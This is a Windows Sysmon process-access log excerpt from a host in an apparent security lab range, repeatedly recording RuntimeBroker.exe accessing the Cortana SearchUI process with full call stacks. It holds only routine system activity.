13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
